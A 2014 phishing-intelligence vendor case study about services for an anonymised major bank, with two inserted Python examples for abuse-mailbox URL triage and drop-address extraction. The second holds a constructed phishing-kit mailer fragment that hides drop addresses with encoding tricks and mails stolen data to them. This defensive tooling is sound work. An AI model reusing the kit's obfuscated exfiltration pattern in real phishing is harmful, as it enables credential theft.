How a Major Bank Battled its Phishing: A Real World Case Study

MALCOVERY
S E C U R I T Y
January 2014
© Copyright 2014 Malcovery Security, LLC. All rights reserved.
Background
The Major American Bank Corporation (MAB) is a
multinational banking and financial services corporation
headquartered in the Southeastern United States. It is one of
the largest bank holding companies in the United States by
assets. The bank has made acquisitions over the past 5 to 7
years, making it one of the world’s largest wealth management
corporations and a major player in the investment banking
market.
Despite layers of security technology and tools, including
security awareness and training for employees, web and email
client filters, web gateway blacklists, implementing standards
such as DMARC, and employing the use of takedown services
(internally or externally), the phishing and malicious spam
problem has grown – and has become even more successful.
While all industries are subject to phishing, over 20 percent of
phishing attacks target financial institutions. It’s no surprise
that banking and financial institutions have increasingly
attracted unwanted criminal attention. When attacking banks
and their users, cybercriminals go right to the money – their
main motivation.
MAB and Malcovery
After an initial evaluation period, Malcovery entered into a
contract with MAB for phishing intelligence services, including
monthly intelligence reports called Phishing Intelligence
Report™, and access to Malcovery’s portal of intelligence
regarding ‘credential phishing web sites,’ called PhishIQ™.
Like many companies, and particularly financial institutions,
MAB experiences millions of dollars of losses each year due
to phishing. During its engagement with MAB, Malcovery
demonstrated how its alignment with the bank’s three-tiered
approach to phishing – incorporating pro-active and reactive
measures with intelligence – could significantly reduce these
losses. The intelligence provided by Malcovery is estimated
to have enabled a savings for MAB of $2 million, for an
excellent return of 800%.
Results Delivered
Malcovery delivered to MAB the most thorough and timely
intelligence available anywhere about phishing. That is,
detailed monthly reports were prepared by a threat
intelligence team that included a Malcovery analyst working
with MAB. These reports not only outlined statistics on
hundreds of phishing web sites targeting MAB’s customers
each month, but they also guided the bank in how to prioritize
its investigative actions and mitigation efforts. Each monthly
report provided an in-depth analysis about each of the
five largest phishing clusters identified that month, along
with spotlighting any new criminals and criminal methods
identified.
Table 1 provides a summary of the volume of data reported
to MAB.
Month            Phishing attacks  # with kits  Unique criminal email addresses
December 201X                 554          167                              162
January 201X                  789          254                               50
February 201X                 516          190                               30
March 201X                    146            6                               15
April 201X                    169           16                               15
May 201X                      957            3                                6
June 201X                      74            6                               10
July 201X                   1,076          289                              172
August 201X                   214           81                              140
September 201X                461          149                              176
October 201X                  520          166                              214
November 201X                 678           89                              214
Total                       6,154        1,416                            1,204
Table 1 Summary of Phishing Data Reported to MAB
The most important numbers in Table 1 are the 6,154
phishing attacks that targeted MAB and the 1,204 drop
email addresses identified in the criminal toolkits. A high
volume of phishing attacks not only points to high losses
among consumers but also to the amount of forensic data
that Malcovery analyzes for MAB. The more live phishing
attacks that can be identified, the more forensic data there is
to manipulate and find clues from correlation among attacks
and from the inevitable mistakes that criminals make.
Malcovery also provided for up to twelve phishing
investigative reports. MAB made requests that Malcovery
responded to with detailed reports based on its process
called The Seven Phases of Phishing Investigation.
These reports were highly-detailed exposés that each focused
on a large or interesting phishing attack from the previous
month, with the goal of identifying and communicating
to MAB the underlying patterns within the massive amounts
of forensic data about the attacks. These patterns often
included a range of IP addresses, components of the phishing
web site Internet addresses (URL), a set of domain names, or a
set of criminal email addresses. The patterns recognized were
used to recommend specific actions for the bank, including
actions such as initiating subpoenas to Internet Service
Providers and looking further into the bank’s own computer
logs for additional information about the phishing attack.
Malcovery staffers have become familiar with the “look and
feel” of all types of MAB phishing sites and have kept detailed
records so that they could notify the bank’s representatives
of any new actionable intelligence. Throughout the year, they
sent email notifications to bank representatives whenever
stolen credential lists, known as drop files, were identified.
Malcovery also provided access for MAB representatives to its
PhishIQ™ portal. The portal provides the most timely, complete,
and convenient access for MAB to data about phishing web
sites targeting the bank. During the year, Malcovery added a
significant number of new features to the portal and enhanced
the load and search times of the web interface. Some new
features included the addition of screenshots of the main
phishing pages, the ability to search on drop email addresses,
and the option to export data to a CSV file.
Finally, Malcovery started processing the MAB Abuse Box.
This means that the bank forwarded to Malcovery all of the
bank’s employees’ and customers’ email messages regarding
suspected online fraud so that Malcovery could extract
phishing web site addresses, process them, and add them
to the Malcovery phishing data mine. Prior to directing the
Abuse Box messages to Malcovery, the bank did not have
the capacity to read and analyze each message received
externally. Malcovery’s Automated processing provides a
quicker response time so that MAB knows which messages
concern phishing and which may be part of a malicious spam
campaign. The Abuse Box is also a rich feed of phishing URLs
that get correlated with Malcovery’s other sources of phishing
attack data.
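The Abuse Box workflow described above (reports forwarded to one mailbox, phishing URLs extracted and processed, then correlated with other phishing data) sketched as a small triage script. This is an added example, not Malcovery’s processing code: the three messages are constructed, every hostname is an RFC 2606 reserved domain, and grouping URLs by the last three path components is an assumed heuristic that stands in for the URL-component correlation the case study mentions.

```python
"""Triage an abuse-mailbox feed: pull URLs out of forwarded reports and
cluster them by the tail of the URL path, so that copies of one phishing
kit unpacked on different hosts land in the same group.

Added example (not Malcovery's code). The messages below are constructed
and use only RFC 2606 reserved domains; grouping by path suffix is an
assumed heuristic, not a description of Malcovery's actual processing."""
import re
from collections import defaultdict
from email import message_from_string
from urllib.parse import urlsplit

URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.IGNORECASE)

# Constructed raw abuse-box messages (RFC 5322 text); not real reports.
ABUSE_BOX = [
    "From: customer1@example.com\n"
    "To: abuse@example.com\n"
    "Subject: Fwd: Urgent: verify your account\n"
    "Content-Type: text/plain\n"
    "\n"
    "Is this real? http://example.net/~tmp/bank/online/login.php?id=1\n",
    "From: customer2@example.com\n"
    "To: abuse@example.com\n"
    "Subject: Fwd: Account locked\n"
    "Content-Type: text/html\n"
    "\n"
    "<html><body><a href=\"http://example.org/images/bank/online/login.php\">"
    "Sign in</a></body></html>\n",
    "From: employee@example.com\n"
    "To: abuse@example.com\n"
    "Subject: Suspicious mail\n"
    "Content-Type: text/plain\n"
    "\n"
    "Same kit, new victim id: https://example.net/~tmp/bank/online/login.php?id=2.\n"
    "Also a genuine link: https://www.example.com/help/contact\n",
]


def extract_urls(raw_message):
    """Return the URLs found in every text part of one raw email message."""
    msg = message_from_string(raw_message)
    urls = []
    for part in msg.walk():
        if part.get_content_maintype() != "text":
            continue
        payload = part.get_payload(decode=True) or b""
        text = payload.decode(part.get_content_charset() or "utf-8", "replace")
        # Trailing sentence punctuation is not part of the URL.
        urls.extend(u.rstrip(".,;:)") for u in URL_RE.findall(text))
    return urls


def kit_signature(url, depth=3):
    """Last `depth` path components with the query string dropped: the part
    of the URL a kit keeps wherever it is unpacked (assumed heuristic)."""
    parts = [p for p in urlsplit(url).path.split("/") if p]
    return "/".join(parts[-depth:])


def triage(messages):
    """Cluster every reported URL by kit signature.

    Returns {signature: {"hosts": [...], "urls": [...]}} with sorted,
    de-duplicated lists; a signature seen on two or more hosts is the
    correlation an analyst would chase first."""
    clusters = defaultdict(lambda: {"hosts": set(), "urls": set()})
    for raw in messages:
        for url in extract_urls(raw):
            host = urlsplit(url).hostname
            if not host:
                continue
            cluster = clusters[kit_signature(url)]
            cluster["hosts"].add(host.lower())
            cluster["urls"].add(url)
    return {sig: {"hosts": sorted(c["hosts"]), "urls": sorted(c["urls"])}
            for sig, c in clusters.items()}


def multi_host_clusters(clusters):
    """Signatures that appear on more than one host, most hosts first."""
    hits = [(sig, c) for sig, c in clusters.items() if len(c["hosts"]) > 1]
    return sorted(hits, key=lambda item: -len(item[1]["hosts"]))


if __name__ == "__main__":
    for sig, c in multi_host_clusters(triage(ABUSE_BOX)):
        print(f"{sig}: {len(c['urls'])} URLs on {len(c['hosts'])} hosts {c['hosts']}")
```

Run on the constructed feed, the only multi-host cluster is `bank/online/login.php`, reported three times across two hosts, while the customer’s legitimate help link stays in its own single-host group. Adding the hosting IP address and the contents of the kit directory to the grouping key is the natural next step toward the clustered monthly view that Table 1 counts.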
T3: Additional Intelligence Regarding
Email-Based Threats
In response to the growing incidence of malicious spam over
and above credential phishing, Malcovery built Today’s Top
Threats (T3) from a threat alerting system that was known in
its infancy at the University of Alabama at Birmingham (UAB)
as Emerging Threats by Email. T3 identifies the most prolific
malicious spam campaigns each day and delivers intelligence
about them via emailed reports and via XML-formatted,
machine-consumable files on Malcovery’s secure website.
Recently Malcovery announced support for the STIX
Threat Intelligence format for this data.
Malicious spam reaches tens of millions of email users
every day, with the goal of commandeering the user’s device
through the delivery of either (1) malware as an attachment to
a convincing email message spoofing one of over 100 well-known
brands, or (2) a link to customized malware enabled by
criminal exploit kits such as Blackhole.
The most common payload of malicious spam campaigns
is the Zeus Banking Trojan, which can take over control of
the victim’s computer and steal online banking credentials,
among other PII (Personally Identifiable Information). As one of
the largest banks in the country, MAB is a leader in protecting
consumers from this growing menace by performing real-time,
cross-channel fraud detection. With the intelligence
provided in daily T3 reports, the bank is enabled to protect
its own employees and networks and to further reduce fraud
losses from email-based threats.
Singularity of Capabilities
and Offerings
Malcovery’s database was initially built on data that was
collected at the University of Alabama at Birmingham (UAB)
starting in 2007. Due to the quantity of data collected and to
the innovations of its researchers, UAB is at the forefront of all
research universities worldwide in understanding this vector
of fraud and how to mitigate it. An estimated $2.8 million
was invested by the university to establish its state-of-the-art
anti-phishing technology. Additionally, UAB leaders formed
and nourished relationships with other interested parties in
commerce and law enforcement – such as the Anti-Phishing
Working Group, the Federal Bureau of Investigation, and the
Financial Services Information Sharing and Analysis Center –
so that the intelligence amassed at UAB about phishing is
unparalleled.
Due to these unique relationships and others, UAB was
identifying more phishing sites than all other sources
combined, and, more significantly, developed [now patented]
computer software that could automatically identify the
targeted brand associated with suspected phishing web sites
and extract forensic evidence about phishing criminals.
The bottom line? Malcovery’s services support the bank’s
bottom line, not only by reducing phishing fraud losses but
also by reducing personnel expenses and takedown costs,
improving the efficiency and efficacy of investigations, and
protecting the bank’s valuable brands by enhancing trust
among its stakeholders.
At the start of the contract with MAB, Malcovery licensed this
historical data and the processes from UAB and has since
expanded on and improved the collection and identification of
phishing sites and the storage, manipulation, and analysis of
the related intelligence.
Malcovery’s turnkey phishing data collection processes do
more than just identify a web site as a phishing web site
targeting a brand. Although not a standard practice in the
phishing takedown industry, it is essential to collect and
store in a forensically-sound manner all the Internet files
that are used to create phishing web sites. One component
of these processes involves the automated extraction of
criminal email addresses. While some of the email addresses
are fairly easy to identify, many of them are obfuscated, or
hidden, using encryption or other means of manipulating
code so that it is hard for humans to find the email addresses.
Malcovery automatically de-obfuscates eight different tricks
of the criminals’ trade. It is this software that, along with
the patented software that identifies the targeted brand of
a suspected phishing web site, forms the basis for Seven
Phases of Phishing Investigation and enables the successful
and crucial prioritization of investigations. By being able to
associate one criminal or criminal gang to a set of thousands
of phishing web sites, the process eliminates what those in
the phishing takedown industry refer to as Whac-a-Mole.
Contact:
Corporate and Development Office:
Malcovery Security, LLC
2400 Oxford Drive #302
Bethel Park, PA 15102
Phone: 855-625-2683
Email: [email protected]
Twitter: @malcovery
Facebook: Malcovery
LinkedIn: Malcovery
Website: www.malcovery.com
Google+: Malcovery
Blog: http://www.malcovery.com/blog/
Research Office:
Malcovery Security, LLC
1500 First Avenue North Suite 83
Birmingham, AL 35203
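The automated extraction of criminal drop email addresses from the files of a phishing kit, including de-obfuscation, that the Singularity of Capabilities and Offerings section describes, as an added example. It is not Malcovery’s patented or de-obfuscation software and does not reproduce its eight tricks, which the case study does not name; the five decoders here (base64, hex escapes, chr() concatenation, str_rot13, strrev) are assumed, commonly seen PHP-level hiding techniques, and the kit fragment with its drop addresses is constructed on RFC 2606 reserved domains.

```python
"""Recover drop email addresses from a phishing kit's mailer source.

Added example (not Malcovery's software). The five decoders are assumed,
commonly seen PHP-level obfuscation tricks; the kit fragment and every
address in it are constructed and use RFC 2606 reserved domains."""
import base64
import binascii
import codecs
import re

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")

# Constructed fragment of a kit mailer script; not taken from a real kit.
KIT_SOURCE = r'''<?php
$to  = "drop1@example.com";
$cc  = base64_decode("ZHJvcDJAZXhhbXBsZS5uZXQ=");
$bcc = "\x64\x72\x6f\x70\x33\x40\x65\x78\x61\x6d\x70\x6c\x65\x2e\x6f\x72\x67";
$alt = chr(100).chr(114).chr(111).chr(112).chr(52).chr(64).chr(101).chr(120)
     . chr(97).chr(109).chr(112).chr(108).chr(101).chr(46).chr(99).chr(111).chr(109);
$hid = str_rot13("qebc5@rknzcyr.arg");
$rev = strrev("gro.elpmaxe@6pord");
mail($to, $subject, $message, "From: $from\r\nBcc: $bcc");
'''


def _decode_b64(m):
    """base64_decode('...') -> the decoded literal; leave non-base64 alone."""
    try:
        return '"' + base64.b64decode(m.group(2), validate=True).decode("utf-8") + '"'
    except (binascii.Error, UnicodeDecodeError):
        return m.group(0)


def _decode_chr_run(m):
    """chr(100).chr(114)... -> the string those code points spell."""
    codes = re.findall(r"chr\((\d+)\)", m.group(0))
    return '"' + "".join(chr(int(n)) for n in codes) + '"'


# (name, pattern, replacement) for each assumed obfuscation trick.
DECODERS = [
    ("base64_decode",
     re.compile(r"""base64_decode\(\s*(['"])([A-Za-z0-9+/=]+)\1\s*\)"""),
     _decode_b64),
    ("hex_escape",
     re.compile(r"\\x([0-9A-Fa-f]{2})"),
     lambda m: chr(int(m.group(1), 16))),
    ("chr_concat",
     re.compile(r"(?:chr\(\d+\)\s*(?:\.\s*)?)+"),
     _decode_chr_run),
    ("str_rot13",
     re.compile(r"""str_rot13\(\s*(['"])(.*?)\1\s*\)"""),
     lambda m: '"' + codecs.decode(m.group(2), "rot13") + '"'),
    ("strrev",
     re.compile(r"""strrev\(\s*(['"])(.*?)\1\s*\)"""),
     lambda m: '"' + m.group(2)[::-1] + '"'),
]


def deobfuscate(source, max_rounds=10):
    """Apply every decoder until the text stops changing (nested tricks such
    as base64 wrapped around rot13 need more than one round).

    Returns (decoded_source, set of decoder names that changed something)."""
    used = set()
    for _ in range(max_rounds):
        before = source
        for name, pattern, repl in DECODERS:
            new = pattern.sub(repl, source)
            if new != source:
                used.add(name)
                source = new
        if source == before:
            break
    return source, used


def extract_drop_addresses(source):
    """Sorted, de-duplicated email addresses visible after de-obfuscation."""
    decoded, _ = deobfuscate(source)
    return sorted(set(EMAIL_RE.findall(decoded)))


if __name__ == "__main__":
    decoded, used = deobfuscate(KIT_SOURCE)
    print("tricks found:", sorted(used))
    for addr in extract_drop_addresses(KIT_SOURCE):
        print("drop address:", addr)
```

De-obfuscating before scanning matters for more than recall: a plain regex pass over the raw source finds only the unhidden address and also reports the rot13-encoded literal as if it were a real mailbox, so an investigation keyed on that string would chase a name that exists nowhere. The set of tricks a kit uses is itself a fingerprint worth recording alongside the recovered addresses when correlating kits across sites.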
Conclusion
In summary, all of these phishing services provided by
Malcovery come together to identify phishing criminal activity
through a nexus of very large amounts of archived data
that includes IP addresses, phishing kit details, association
to other phishing web sites, and comparison to similar web
sites attacking other brands. Experience has shown that
such extensive data is needed in order to support the large
phishing investigations that have resulted from banks such as
MAB, and their commitment to fighting phishing. The team of
professionals that has been assembled at Malcovery provides
in-depth knowledge of phishing attacks against MAB. This
knowledge has become invaluable to MAB as it continues to
combat fraud and other e-mail-based threats.